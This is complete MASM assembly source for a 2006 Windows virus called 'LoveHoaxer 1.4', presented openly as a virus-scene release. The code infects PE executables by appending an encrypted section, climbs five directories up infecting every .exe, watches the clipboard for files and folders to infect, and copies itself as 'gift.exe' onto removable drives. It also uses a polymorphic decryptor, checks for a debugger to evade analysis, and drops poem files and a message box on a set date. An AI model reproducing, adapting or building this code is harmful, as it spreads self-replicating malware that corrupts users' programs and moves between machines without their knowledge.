;lust 1.4 [LoveHoaxer]
;
;coded by : fakedminded 2006 [a current EOF-project member]
;Method : the virus will add new section into pe exe files,installers will not be infected..(and few other exe models!)
; the virus searches the directories by going upward five times trying to infect any
; victim file in its way,then try to create mutex for clipboard sniffer of directories and executables to infect
; and if already exists it will try to make another mutex for flash disk dropping and if it is also exists it just sleeps .
; It has a simple polymorphic engine for its decrypter,and multi-encryption
; key is created for each offspring!,It will run old host as a new thread.
;Payload : On 13/1 of every year it will create mass amount of files containing certain poem!
; and it will display that poem.
;SIZE : ~4043 of bytes!!
;Greetings: EOF-project members a big non-gay hug to all of you :))
; Vxers from all round the world keep the ancients heritage and dont spoil everything !
; Avers -none greetings for you ...
; M$ keep the good work on making exploited OSes ...nice guys making hackers world --plain
; My real life friends ,hoping to have nice life..(especially _mh) ah yeah..viscosity,Mr.Bean,Maryoosh,ahk..all of you guys :lol:
; My l(o/u)st love you dont know me ,,but I created this shit for you..bitch :D
;-----------------------------------------
;NOTE : inorder to assemble it :
;-----------------------------------------
;@echo off
;\masm32\bin\ml /c /coff /Cp lovehoaxer.asm
;\masm32\bin\link /filealign:0x200 /section:.text,RWX /subsystem:windows /libpath:\masm32\lib lovehoaxer.obj
;pause
;PEWRSEC.COM lovehoaxer.exe
;pause
;-----------------------------------------
;
;nop it all----------------------------90h
;
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
vir_size=offset end__ -offset start
_sub =offset _enc-offset start
.data
db "LoveHoaxer 1.4",0
.code
start:
call daemon
daemon:
pop eax
xchg eax,eax
mov ebp,eax
sub ebp,offset daemon
cmp ebp,0
je _enc
mov esi,offset _enc
add esi,ebp
xor ecx,ecx
jmp pass1
decrypt_str dd 1234
pass1:
xor eax,eax
mov eax,[ebp+offset decrypt_str]
decrypt_size = offset __enc - offset decrypt
decrypt:
xor dword ptr [esi],eax
add esi,4
add ecx,4
cmp ecx,vir_size- _sub
db 40 dup(90h) ;buffer zone :p
__enc:
jnae decrypt
_enc:
jmp code_start
victim_file db "me3za.exe",0 ;just for testing!
curr_entry dd 0
image_curr dd 0
image_base dd 0
prev_entry dd 0
win32_fdata dd 0
find_handle dd 0
buffer dd 0
tid dd 0
hThread dd 0
exitCode dd 0
current_dir dd 0
buffer_clpboard dd 0
h_drop dd 0
clp_mutex db "clp_board~11_!",0
dropper_mutex db "flash_~1@",0
extension db "*.exe",0
dotdot db "..",0
dateformat db "d M y",0
szPayload db "To the whom I loved",13,10,"To the whom I needed",13,10,"You were the only fotune I ever pleaded",13,10
db "You didnt notice I couldnt fake it",13,10
db "Hba you have the womb I liked to seed it :D",13,10,"with love /berniee",13,10,0
string_ db "abcdefgh",0
ext__ db ".txt",0
counter_ db 0
ebp_ dd 0
code_start:
call get_kernel
assume fs:nothing ;install SEH
mov eax,offset handle_err ;Handle Error Exceptions in lame way!
add eax,ebp
push eax
push fs:[0]
mov fs:[0],esp
call find_main_api
call find_other_apis
call [ebp+offset AIsDebuggerPresentF] ;thanx to WarGame for reminding of this function :)
or eax,eax
jnz exit
call payload_
mov eax, dword ptr [ebp+offset image_base]
mov dword ptr [ebp+offset image_curr],eax
mov eax, dword ptr [ebp+offset prev_entry]
mov dword ptr [ebp+offset curr_entry],eax
;jmp test_
push 512
push 0
call [ebp+offset AGlobalAllocF]
mov [ebp+offset current_dir],eax
push [ebp+offset current_dir]
push 512
call [ebp+offset AGetCurrentDirectoryF]
push sizeof WIN32_FIND_DATA
push 0
call [ebp+offset AGlobalAllocF]
or eax,eax
jz exit;abort_
mov [ebp+offset win32_fdata],eax
doit_again:
call folder_infector
mov esi, [ebp+offset win32_fdata]
mov ecx, sizeof WIN32_FIND_DATA
zer0_it:
mov byte ptr [esi],0
inc esi
loop zer0_it
mov eax,offset dotdot
add eax,ebp
push eax
call dword ptr [ebp+offset ASetCurrentDirectoryF]
inc byte ptr [ebp+offset counter_]
cmp byte ptr [ebp+offset counter_],5 ;times upward
jne doit_again
push [ebp+offset current_dir]
call [ebp+offset ASetCurrentDirectoryF]
cmp dword ptr [ebp+offset curr_entry],0
je exit
mov eax,dword ptr [ebp+offset curr_entry]
add eax,dword ptr [ebp+offset image_curr]
mov ebx,offset tid
add ebx,ebp
push ebx
push 0
push 0
push eax
push 0
push 0
call [ebp+offset ACreateThreadF]
or eax,eax
jz exit
mov [ebp+offset hThread],eax
mov eax,offset clp_mutex
add eax,ebp
push eax
push TRUE
push 0
call [ebp+offset ACreateMutexF]
call [ebp+offset AGetLastErrorF]
cmp eax,ERROR_ALREADY_EXISTS
je see_drop
call capture_clpboard
see_drop:
mov eax,offset dropper_mutex
add eax,ebp
push eax
push TRUE
push 0
call [ebp+offset ACreateMutexF]
call [ebp+offset AGetLastErrorF]
cmp eax,ERROR_ALREADY_EXISTS
je loop_nothing
call drop_flash
loop_nothing:
push 3000
call [ebp+offset ASleepF]
jmp loop_nothing
;test_:
;pusha
;mov edx,offset victim_file
;add edx,ebp
;call adding_section
;popa
exit:
pop edx
pop eax
ret
handle_err:
mov eax,[esp+12] ;eax ptr to CONTEXT structure
mov esp,[eax+184+12] ;regEsp
pop fs:[0]
pop eax
ret ;just do nothing in case of errors!
folder_infector: ; infect current folder's files
push [ebp+offset win32_fdata]
mov eax,offset extension
add eax,ebp
push eax
call [ebp+offset AFindFirstFileF]
cmp eax,INVALID_HANDLE_VALUE
je no_more_files ;abort_
mov [ebp+offset find_handle],eax
mov edx,dword ptr [ebp+offset win32_fdata]
add edx,WIN32_FIND_DATA-274
pusha
call adding_section
popa
searching__:
push [ebp+offset win32_fdata]
push [ebp+offset find_handle]
call dword ptr [ebp+offset AFindNextFileF]
call [ebp+AGetLastErrorF]
cmp eax,ERROR_NO_MORE_FILES
je no_more_files
mov edx,dword ptr [ebp+offset win32_fdata]
add edx,WIN32_FIND_DATA-274
pusha
call adding_section
popa
jmp searching__
no_more_files:
push [ebp+offset find_handle]
call [ebp+offset AFindCloseF]
ret
;/////////////////////adding new section at the end of file
;///////////////////
adding_section: ;file infection procedure by adding new section
jmp code_
v_handle dd 0
v_size dd 0
v_mem dd 0
sec_align dd 0
file_align dd 0
add_ed dd 0
bwr dd 0
cur_pe dd 0
v_size_aligned dd 0
virtual_address dd 0
physical_address dd 0
vir_enc_mem dd 0
code_:
push edx
push edx
push 0
call dword ptr [ebp+offset ASfcIsFileProtectedF]
or eax,eax
jnz err_sec
pop edx
push 0
push 0
push 3
push 0
push FILE_SHARE_READ or FILE_SHARE_WRITE
push 40000000h or 80000000h
mov eax,edx
push eax
call dword ptr [ebp+offset ACreateFileF]
mov dword ptr [ebp+offset v_handle],eax
push 0
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset AGetFileSizeF]
mov dword ptr [ebp+offset v_size],eax
push dword ptr [ebp+offset v_size]
push 0
call dword ptr [ebp+offset AGlobalAllocF]
or eax,eax
jz err_sec
mov dword ptr [ebp+offset v_mem],eax
push 0
mov eax,offset bwr
add eax,ebp
push eax
push dword ptr [ebp+offset v_size]
push dword ptr [ebp+offset v_mem]
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset AReadFileF] ;--->completed reading the file to the v_mem
mov edx,dword ptr [ebp+offset v_mem]
cmp word ptr [edx],'ZM'
jne err_sec
add edx,dword ptr [edx+3ch] ;---->I've got to PE!e
cmp word ptr [edx],'EP'
jne err_sec
mov eax, dword ptr [edx+52]
mov dword ptr [ebp+offset image_base],eax ;---->Image base save it
mov eax, dword ptr [edx+40]
mov dword ptr [ebp+offset prev_entry],eax ;---->so as the entry point
xor ecx,ecx
mov cx,word ptr [edx+6h]
inc word ptr [edx+6h] ;sec. numbers=old+1(our new section)
mov eax,dword ptr [edx+60]
mov [ebp+offset file_align],eax
mov eax,dword ptr [edx+56] ;-->section alignment usually 1000
mov [ebp+offset sec_align],eax
mov ebx,eax
mov eax,vir_size ;---->managing the image size
call align__
add dword ptr [edx+80],eax
push edx
xor eax,eax
mov ax,word ptr [edx+14h] ;--->getting the optional header size
add ax,24 ;--->adding 24(offset of optional header from PE) to get into sections' headers
add edx,eax
mov dword ptr [ebp+offset cur_pe],edx ;saving 'pe' offset
xor eax,eax
xor edx,edx
mov eax,28h ;--->getting the last section's header
mul cx
mov edx,[ebp+offset cur_pe]
add edx,eax
sub edx,28h ;substtract 28h (sec. header size) to get the beginning of the last header data
mov eax,dword ptr [edx+0ch] ;--->virtual address of previous section
add eax,dword ptr [edx+08h] ;--->virtual size of previous section
mov ebx,[ebp+offset sec_align] ;--->align them for the new added section virtual address
call align__
mov dword ptr [ebp+offset virtual_address],eax ;--->of the new section
mov eax,dword ptr[edx+20] ;----->pointer of the physical raw data in prev. section
add eax,dword ptr[edx+16] ;----->physical size of prev. section
mov ebx,[ebp+offset file_align] ;--->align according to file aligner
call align__
mov dword ptr [ebp+offset physical_address],eax
continue__:
add edx,28h ;--->going to add our section
mov ecx,28h
loop_grant: ;--->checking out if there is any space there for adding our section
cmp dword ptr [edx],0 ;--alot of ecxeptions
jne err_all
inc edx
loop loop_grant
sub edx,50h
cmp dword ptr [edx],'abh.'
je err_all
add edx,28h
mov dword ptr [edx],'abh.' ;------>section's name
mov eax,vir_size
mov ebx,[ebp+offset file_align] ;---->section's v. size
call align__
mov dword ptr [edx+8],eax ;-------> section's v. size
push dword ptr [ebp+offset virtual_address] ;-----> section v.address
pop dword ptr [edx+12]
mov eax,[edx+12]
mov dword ptr [ebp+offset add_ed],eax
mov dword ptr [edx+16],vir_size ;----->raw size of the new section
push dword ptr [ebp+offset physical_address] ;---->physical address of our new section
pop dword ptr [edx+20]
mov dword ptr [edx+36],0c0000040h ;read and write characteristics of the new section
pop edx ;--returning our old pointer to pe
mov eax,dword ptr [ebp+offset physical_address] ;now after the popping,
;checking if there is some extra in the end
add eax,10000 ;let go some situation ;)
cmp [ebp+offset v_size],eax
jg err_sec
mov eax,[ebp+offset add_ed] ;----> remember the old virtual addres of our new section
mov dword ptr [edx+28h],eax ;---->now it is the new entry point(duh!)
mov eax,[edx+80]
mov [edx+01ch],eax
push FILE_BEGIN
push 0
push 0
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset ASetFilePointerF]
push 0
mov eax,offset bwr
add eax,ebp
push eax
push dword ptr [ebp+offset v_size]
push dword ptr [ebp+offset v_mem]
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset AWriteFileF]
push FILE_BEGIN
push 0
push dword ptr [ebp+offset physical_address]
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset ASetFilePointerF]
call poly_ ;polymorphic procedure
push vir_size
push 0
call dword ptr [ebp+offset AGlobalAllocF]
mov dword ptr [ebp+offset vir_enc_mem],eax
mov edi,dword ptr [ebp+offset vir_enc_mem]
mov esi,offset start
add esi,ebp
mov ecx,vir_size
rep movsb
mov edi,dword ptr [ebp+offset vir_enc_mem]
add edi,_sub
mov eax,[ebp+offset decrypt_str]
loop_encrypt:
xor dword ptr [edi],eax
add edi,4
add ecx,4
cmp ecx,vir_size- _sub
jnae loop_encrypt
push 0
mov eax,offset bwr
add eax,ebp
push eax
push vir_size
;mov eax,offset start
;add eax,ebp
push dword ptr [ebp+offset vir_enc_mem]
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset AWriteFileF] ;----> write our virus to the end of file
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset ACloseHandleF]
ret
err_sec:
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset ACloseHandleF]
ret
err_all:
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset ACloseHandleF]
pop edx
ret
align__:
push edx
xor edx, edx
div ebx
or edx, edx
JZ no_round_up
inc eax
no_round_up:
mul ebx
pop edx
ret
;///////////Clip Board sniffer
;////////////
capture_clpboard: ;search for clipboard for any pe files or folders to infect(readonly will not bee infected!)
push 512
push 0
call [ebp+offset AGlobalAllocF]
mov dword ptr [ebp+offset buffer_clpboard],eax
_label1:
push 0
call [ebp+offset AOpenClipboardF]
push CF_HDROP
call [ebp+offset AGetClipboardDataF]
or eax,eax
jz _sleepClp
mov [ebp+offset h_drop],eax
push 0
push 0
push 0FFFFFFFFh
push eax
call [ebp+offset ADragQueryFileF]
or eax,eax
jz _sleepClp
mov ecx,eax
_getFiles:
push ecx
push 512
push [ebp+offset buffer_clpboard]
dec ecx
push ecx
push [ebp+offset h_drop]
call [ebp+offset ADragQueryFileF]
push [ebp+offset buffer_clpboard]
call [ebp+offset AGetFileAttributesF]
cmp eax,FILE_ATTRIBUTE_READONLY
je see_next
cmp eax,FILE_ATTRIBUTE_DIRECTORY
jne see_normal_file
push [ebp+offset current_dir]
push 512
call [ebp+offset AGetCurrentDirectoryF]
push [ebp+offset buffer_clpboard]
call [ebp+offset ASetCurrentDirectoryF]
call folder_infector
push [ebp+offset current_dir]
call [ebp+offset ASetCurrentDirectoryF]
jmp see_next
see_normal_file:
mov edx,[ebp+offset buffer_clpboard]
pusha
call adding_section
popa
see_next:
pop ecx
loop _getFiles
_sleepClp:
call [ebp+ACloseClipboardF]
mov esi,[ebp+offset buffer_clpboard]
mov ecx,512
call zero_it
push 5000
call [ebp+offset ASleepF]
jmp _label1
exit_clpboard:
ret
payload_: ;ugly payload dont bother
push 512
push 0
call [ebp+offset AGlobalAllocF]
or eax,eax
jz exit_payload
mov [ebp+offset buffer],eax
push 512
push [ebp+offset buffer]
mov eax,offset dateformat
add eax,ebp
push eax
push 0
push 0
push 0
call [ebp+offset AGetDateFormatF]
mov eax,[ebp+offset buffer]
cmp word ptr [eax],"131"
jne exit_payload
xor eax,eax
_crap:
push eax
mov ebx,-1
_stringer:
inc ebx
push ebx
push 73
call [ebp+offset ASleepF]
call rnd_
mov edx,offset string_
add edx,ebp
add edx,eax
mov esi,edx
mov edi,[ebp+offset buffer]
pop ebx
add edi,ebx
mov ecx,1
rep movsb
cmp ebx,10
jne _stringer
mov esi,offset ext__
add esi,ebp
mov ecx,4
rep movsb
push 0
push 0
push 2
push 0
push 0
push 40000000h
push [ebp+offset buffer]
call [ebp+offset ACreateFileF]
mov edx,eax
push edx
push 0
mov eax,offset bwr
add eax,ebp
push eax
push 177
mov eax,offset szPayload
add eax,ebp
push eax
push edx
call [ebp+offset AWriteFileF]
pop edx
push edx
call [ebp+offset ACloseHandleF]
pop eax
inc eax
cmp eax,4
jne _crap
push 0
push [ebp+offset buffer]
mov eax,offset szPayload
add eax,ebp
push eax
push 0
call dword ptr [ebp+offset AMessageBoxF]
exit_payload:
ret
;///////////file dropper
;////////
drop_flash: ;this will drop the infected file into any new attached removavle except floppy drives
jmp @@1
buffer_dropper dd 0
module_name dd 0
file_name db "gift.exe",0
@@1:
push 512
push 0
call [ebp+offset AGlobalAllocF]
mov [ebp+offset buffer_dropper],eax
push 512
push 0
call [ebp+offset AGlobalAllocF]
mov [ebp+offset module_name],eax
push 512
push eax
push 0
call [ebp+offset AGetModuleFileNameF]
search_driver:
push [ebp+offset buffer_dropper]
push 512
call [ebp+offset AGetLogicalDriveStringsF]
mov edx,[ebp+offset buffer_dropper]
_rumble:
push edx
cmp byte ptr [edx],"A"
je seek_nother
push edx
call [ebp+offset AGetDriveTypeF]
cmp eax,DRIVE_REMOVABLE
jne seek_nother
mov esi,[ebp+offset buffer]
mov ecx,256
call zero_it
pop edx
push edx
mov esi,edx
mov edi,[ebp+offset buffer]
mov ecx,3
rep movsb
mov edi,[ebp+offset buffer]
add edi,3
mov esi,offset file_name
add esi,ebp
mov ecx,8
rep movsb
push FALSE
push [ebp+offset buffer]
push [ebp+offset module_name]
call [ebp+offset ACopyFileF]
seek_nother:
pop edx
add edx,4
cmp byte ptr [edx+1],0
je sleep_baby
jmp _rumble
sleep_baby:
push 5000
call [ebp+offset ASleepF]
mov esi,[ebp+offset buffer_dropper]
mov ecx,512
call zero_it
jmp search_driver
ret
zero_it:
mov byte ptr[esi],0
inc esi
loop zero_it
ret
counter_poly dd 0
poly_: ;poly engine a pre-historic one
call rnd_
inc eax
mov esi,offset part_1
add esi,ebp
xor ecx,ecx
call seek_another
mov esi,edi
mov edi,offset decrypt
add edi,ebp
add [ebp+offset counter_poly],ebx
mov ecx,ebx
rep movsb
push edi
call rnd_
inc eax
mov esi,offset part_2
add esi,ebp
xor ecx,ecx
call seek_another
mov esi,edi
pop edi
add [ebp+offset counter_poly],ebx
mov ecx,ebx
rep movsb
push edi
call rnd_
inc eax
mov esi,offset part_3
add esi,ebp
xor ecx,ecx
call seek_another
mov esi,edi
pop edi
add [ebp+offset counter_poly],ebx
mov ecx,ebx
rep movsb
push edi
call rnd_
inc eax
mov esi,offset part_4
add esi,ebp
xor ecx,ecx
call seek_another
mov esi,edi
pop edi
add [ebp+offset counter_poly],ebx
mov ecx,ebx
rep movsb
mov ecx,10 ;better than this could be done
call nop_it
ret
seek_another:
xor ebx,ebx
mov edi,esi
seek_opcode:
inc ebx
inc esi
cmp byte ptr [esi],0ffh
jne seek_opcode
inc esi
inc ecx
cmp ecx,eax
jne seek_another
ret
nop_it:
mov byte ptr[edi],90h
inc edi
loop nop_it
ret
rnd_: ;rnd will get 6-random range number
call [ebp+offset AGetTickCountF]
add eax,666h
loop_4:
xor edx,edx
mov ecx,6
div ecx
xchg edx,eax
cmp eax,6
ja loop_4
cmp eax,0
ja @continue_
mov ecx,1
@continue_:
ret
poly_data: ;---the other opcodes to be replaced by the old opcodes in the decryptor
part_1:
push eax
mov eax,eax
pop eax
xor dword ptr [esi],eax
db 0ffh
mov edx,eax
mov eax,edx
xor dword ptr [esi],eax
db 0ffh
xchg dword ptr [esi],eax
xor eax,dword ptr [esi]
xchg dword ptr [esi],eax
db 0ffh
ror dword ptr[esi],32
xor dword ptr [esi],eax
db 0ffh
push esi
pop edx
xor dword ptr [edx],eax
db 0ffh
inc edx
xor dword ptr [esi],eax
db 0ffh
part_2:
add esi,3
inc esi
db 0ffh
mov edx,esi
add edx,4
push edx
pop esi
db 0ffh
add esi,4
db 0ffh
push esi
add esi,2
pop esi
add esi,4 ; :P
db 0ffh
ror esi,32
add esi,4
db 0ffh
ror esi,16
rol esi,16
add esi,4
db 0ffh
part_3:
mov ebx,3
add ecx,ebx
inc ecx
db 0ffh
ror ecx,32
add ecx,4
db 0ffh
add ecx,4
db 0ffh
inc ecx
inc ecx
add ecx,2
db 0ffh
add ecx,3
inc ecx
db 0ffh
rol ecx,32
add ecx,3
inc ecx
db 0ffh
part_4:
cmp ecx,vir_size- _sub
db 0ffh
push ecx
pop ebx
cmp ebx,vir_size- _sub
db 0ffh
mov edx,ecx
cmp edx,vir_size- _sub
db 0ffh
mov ebx,ecx
push ebx
pop edx
cmp edx,vir_size-_sub
db 0ffh
mov edx,ecx
push edx
pop ebx
cmp ebx,vir_size-_sub
db 0ffh
mov edx,ecx
xchg ecx,edx
cmp edx,vir_size-_sub
db 0ffh
find_other_apis:
jmp fo_code
dll_base dd 0
advapi32N db "advapi32.dll",0
advapi32A dd 0
user32N db "user32.dll",0
user32A dd 0
shell32N db "shell32.dll",0
shell32A dd 0
urlmonN db "urlmon.dll",0
sfcN db "sfc.dll",0
sfcA dd 0
apis_name:
CreateFileF db "CreateFileA",0
CloseHandleF db "CloseHandle",0
WriteFileF db "WriteFile",0
ReadFileF db "ReadFile",0
GetFileSizeF db "GetFileSize",0
GlobalAllocF db "GlobalAlloc",0
SetFilePointerF db "SetFilePointer",0
GetVersionExF db "GetVersionExA",0
GetDateFormatF db "GetDateFormatA",0
SleepF db "Sleep",0
FindFirstFileF db "FindFirstFileA",0
FindNextFileF db "FindNextFileA",0
FindCloseF db "FindClose",0
GetLastErrorF db "GetLastError",0
ExitProcessF db "ExitProcess",0
LoadLibraryF db "LoadLibraryA",0
FreeLibraryF db "FreeLibrary",0
GetEnvironmentVariableF db "ExpandEnvironmentStringsA",0
GetModuleFileNameF db "GetModuleFileNameA",0
CopyFileF db "CopyFileA",0
GetCurrentDirectoryF db "GetCurrentDirectoryA",0
SetCurrentDirectoryF db "SetCurrentDirectoryA",0
GetFileAttributesF db "GetFileAttributesA",0
GetTickCountF db "GetTickCount",0
CreateThreadF db "CreateThread",0
IsDebuggerPresentF db "IsDebuggerPresent",0
CreateMutexF db "CreateMutexA",0
GetLogicalDriveStringsF db "GetLogicalDriveStringsA",0
GetDriveTypeF db "GetDriveTypeA",0
dd 0ffh
apis_address:
ACreateFileF dd 0
ACloseHandleF dd 0
AWriteFileF dd 0
AReadFileF dd 0
AGetFileSizeF dd 0
AGlobalAllocF dd 0
ASetFilePointerF dd 0
AGetVersionExF dd 0
AGetDateFormatF dd 0
ASleepF dd 0
AFindFirstFileF dd 0
AFindNextFileF dd 0
AFindCloseF dd 0
AGetLastErrorF dd 0
AExitProcessF dd 0
ALoadLibraryF dd 0
AFreeLibraryF dd 0
AGetEnvironmentVariableF dd 0
AGetModuleFileNameF dd 0
ACopyFileF dd 0
AGetCurrentDirectoryF dd 0
ASetCurrentDirectoryF dd 0
AGetFileAttributesF dd 0
AGetTickCountF dd 0
ACreateThreadF dd 0
AIsDebuggerPresentF dd 0
ACreateMutexF dd 0
AGetLogicalDriveStringsF dd 0
AGetDriveTypeF dd 0
dd 0ffh
;urlmon_api:
;URLDowanloadToFileF db "URLDownloadToFileA",0
;urlmon_addresses:
;AURLDowanloadToFileF dd 0
;dd 0ffh
sfc_api:
SfcIsFileProtectedF db "SfcIsFileProtected",0
sfc_addresses:
ASfcIsFileProtectedF dd 0
dd 0ffh
shell32_api:
DragQueryFileF db "DragQueryFileA",0
shell32_addresses:
ADragQueryFileF dd 0
dd 0ffh
user32_api:
OpenClipboardF db "OpenClipboard",0
CloseClipboardF db "CloseClipboard",0
GetClipboardDataF db "GetClipboardData",0
MessageBoxF db "MessageBoxA",0
user32_addresses:
AOpenClipboardF dd 0
ACloseClipboardF dd 0
AGetClipboardDataF dd 0
AMessageBoxF dd 0
dd 0ffh
fo_code:
mov esi,offset apis_name
mov edi,offset apis_address
add esi,ebp
add edi,ebp
push [ebp+offset kernel_base]
pop [ebp+offset dll_base]
call l00p_apis
;mov eax,offset urlmonN
;add eax,ebp
;push eax
;call [ebp+offset ALoadLibraryF]
;or eax,eax
;jz exit
;mov [ebp+offset dll_base],eax
;mov esi,offset urlmon_api
;mov edi,offset urlmon_addresses
;add esi,ebp
;add edi,ebp
;call l00p_apis
mov eax,offset user32N
add eax,ebp
push eax
call [ebp+offset ALoadLibraryF]
or eax,eax
jz exit
mov [ebp+offset dll_base],eax
mov esi,offset user32_api
mov edi,offset user32_addresses
add esi,ebp
add edi,ebp
call l00p_apis
mov eax,offset shell32N
add eax,ebp
push eax
call [ebp+offset ALoadLibraryF]
or eax,eax
jz exit
mov [ebp+offset dll_base],eax
mov esi,offset shell32_api
mov edi,offset shell32_addresses
add esi,ebp
add edi,ebp
call l00p_apis
mov eax,offset sfcN
add eax,ebp
push eax
call [ebp+offset ALoadLibraryF]
or eax,eax
jz exit
mov [ebp+offset dll_base],eax
mov esi,offset sfc_api
mov edi,offset sfc_addresses
add esi,ebp
add edi,ebp
call l00p_apis
ret
l00p_apis:
mov eax,esi
push eax
push [ebp+offset dll_base]
call dword ptr[ebp+offset AGetProcAddressF]
or eax,eax
jz exit
mov dword ptr [edi],eax
l00p_small:
inc esi
cmp byte ptr[esi],0
jne l00p_small
next_api_name:
inc esi
add edi,4
cmp dword ptr [edi],0ffh
je finish_fo
jmp l00p_apis
finish_fo:
ret
;///////////////////getting kernel base/////////////
get_kernel:
jmp this_code
kernel_base dd 0
this_code:
mov ecx,[esp+4]
loop_find_kernel:
xor edx,edx
dec ecx
mov dx,[ecx+3ch]
test dx,0f800h
jnz loop_find_kernel
cmp ecx,[ecx+edx+34h]
jnz loop_find_kernel
cmp word ptr [ecx],"ZM"
jne loop_find_kernel
mov [ebp+offset kernel_base],ecx
lrrt:
ret
;/////////////////end getting kernel base///////////////
find_main_api:
jmp finder_data
PE_offset dd 0
Export_address dd 0
Export_size dd 0
Current_kern dd 0
function_no dd 0
function_addr dd 0
function_ord dd 0
function_name dd 0
base_ord dd 0
GetProcAddressF db "GetProcAddress",0
AGetProcAddressF dd 0
GetModuleHandleN db "GetModuleHandleA",0
GetModuleHandleAd dd 0
finder_data:
mov edi,[ebp+offset kernel_base]
add edi,[edi+3ch] ;just checking
cmp word ptr [edi],"EP"
jne exit
mov dword ptr [ebp+offset PE_offset],edi
mov eax,[edi+78h] ;export table rva
push eax
mov eax,[edi+7ch] ;export table size
mov [ebp+offset Export_size],eax
pop eax
mov [ebp+offset Export_address],eax
add eax,[ebp+offset kernel_base]
mov edx,[eax+16] ; ordinal base
add edx,[ebp+offset kernel_base]
mov [ebp+offset base_ord],edx
mov edx,[eax+24] ;no. of exported functions
mov [ebp+offset function_no],edx
mov edx,[eax+28] ;rva of exported functions
add edx,[ebp+offset kernel_base]
mov [ebp+offset function_addr],edx
mov edx,[eax+32] ; rva of exported function name
add edx,[ebp+offset kernel_base]
mov [ebp+offset function_name],edx
mov edx,[eax+36] ;rva for name ordinal
add edx,[ebp+offset kernel_base]
mov [ebp+offset function_ord],edx
xor edx,edx
xor eax,eax
mov eax,[ebp+offset function_name] ; getting the GetProcAddress api address
mov edx,offset GetProcAddressF
add edx,ebp
xor ecx,ecx
mov edi,[eax]
add edi,[ebp+offset kernel_base]
loop_search_1:
mov esi,edx
match_byte:
cmpsb
jne Next_one
cmp byte ptr [edi],0
je Got_it
jmp match_byte
Next_one:
add cx,1
add eax,4
mov edi,[eax]
add edi,[ebp+offset kernel_base]
jmp loop_search_1
jmp exit
Got_it:
mov edi,[eax]
add edi,[ebp+offset kernel_base]
shl ecx,1
mov eax,[ebp+offset function_ord]
add eax,ecx
xor ecx,ecx
mov cx,word ptr [eax]
shl ecx,2
mov eax,[ebp+offset function_addr]
add eax,ecx
mov eax,[eax]
add eax,[ebp+offset kernel_base]
mov [ebp+offset AGetProcAddressF],eax
ret
exit_finder:
mov eax,0
ret
end__:
end start ;end of story!